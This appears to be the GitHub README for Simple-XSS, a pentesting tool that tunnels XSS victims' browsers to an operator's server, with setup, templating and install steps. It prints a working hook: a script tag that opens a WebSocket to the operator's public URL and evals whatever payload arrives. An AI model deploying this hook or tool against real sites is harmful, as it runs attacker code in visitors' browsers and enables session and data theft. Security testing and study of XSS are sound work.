Simple-XSS

Simple-XSS is a multi-platform cross-site scripting (XSS) vulnerability exploitation tool for pentesting. This application will help you create a hook that can easily and reliably catch a client by downloading a payload to their browser and executing it. You don't even need a white IP for this because the application will take care of tunneling the connection between you and the victim.

Disclaimer: This program is provided for educational and research purposes only. The creator of this program does not condone or support any illegal or malicious activity, and will not be held responsible for any such actions taken by others who may use this program. By downloading or using this program, you acknowledge that you are solely responsible for any consequences that may result from the use of this program.

Usage

Use --help argument to get help.

GUI-Guide

Firstly, choose the hook. Default hook is the simplest hook, it is only suitable for forms without XSS protection:

Then, choose the payload. Hello world payload is an example payload, it just alerts "Hello, World!":

Now, lets set up tunneling. Tunneling is needed to make a local server public. You have 2 options:

use one of the suggested tunneling apps (now it's only ngrok)
tunnel ports yourself and pass the public URL of the HTTP tunnel to the program

Finally, you can run the process!

Now you can copy the hook and start hunting ;D

To demonstrate the possibilities, we can use site xss-game.appspot.com. Enter the hook into search form:

Press "Search". As you can see, we have the alert dialog!

Also, we have "Hello, World!" in our console:

Hook

Hooks folder: hooks

Hook is an HTML code snippet designed to be embedded in a vulnerable XSS form. It looks like:

<script>c = new WebSocket('{{environment.public_url}}');c.onmessage = (e) => eval(e.data);</script>

NOTE: As you can see here is a built-in variable: {{environment.public_url}}. You can read more about this below.

This is a default hook. When it's embedded in the vulnerable form, it downloads the JS code (payload) via WebSockets protocol from the server and executes it using eval.

Hook has the following structure:

|
+-- hook_folder
    |
    +-- hook.html
    |
    +-- package.toml

hook.html - main file, contains HTML code that can be embedded in vulnerable form.

package.toml - metadata file, contains data about hook such as name, description, author and version.

Payload

Payloads folder: payloads

Payload is an arbitrary JS code that loaded by hook on a vulnerable page and executed with eval.

Payload has the following structure:

|
+-- payload_folder
    |
    +-- payload.js
    |
    +-- package.toml
    |
    +-- init.py

payload.js - main file, contains arbitrary JS code.

package.toml - metadata file, contains data about payload such as name, description, author and version.

init.py - python file, imported when loading payload. Allows you to interact with the client side of payload (payload.js) via WebSockets protocol.

Templating

Built-in objects is an objects passed into hook & payload main files using Jinja templating engine. It contains additional information that may be needed when loading a hook or payload.

Environment

public_url - public address of WebSocket server

Metadata

package - hook or payload

name - name of package
author - package author
version - version of package
description - package description

If you need to use some variable, just use such construction: {{object.variable}}. For example:

alert('{{metadata.name}} - V{{metadata.version}}')

The provided payload code snippet will display an alert dialog showcasing the name and version of the payload.

Interface

Thanks to the use of the Python Flet framework, the application works equally well both in the browser and in the graphical interface.

Graphical

WEB

Command-Line

Installation

Windows

First you need to clone the repository:

git clone https://github.com/CrazyProger1/Simple-XSS

Then go to the folder & install requirements:

cd Simple-XSS
pip install -r windows_requirements.txt

And finally you can run it:

python main.py

Linux

First you need to clone the repository:

git clone https://github.com/CrazyProger1/Simple-XSS

Then go to the folder & install requirements:

cd Simple-XSS
pip install -r linux_requirements.txt

And finally you can run it:

python main.py

License

Simple-XSS is released under the MIT License. See the bundled LICENSE file for details.

cation-cmd / simple-xss Goto Github PK

simple-xss's Introduction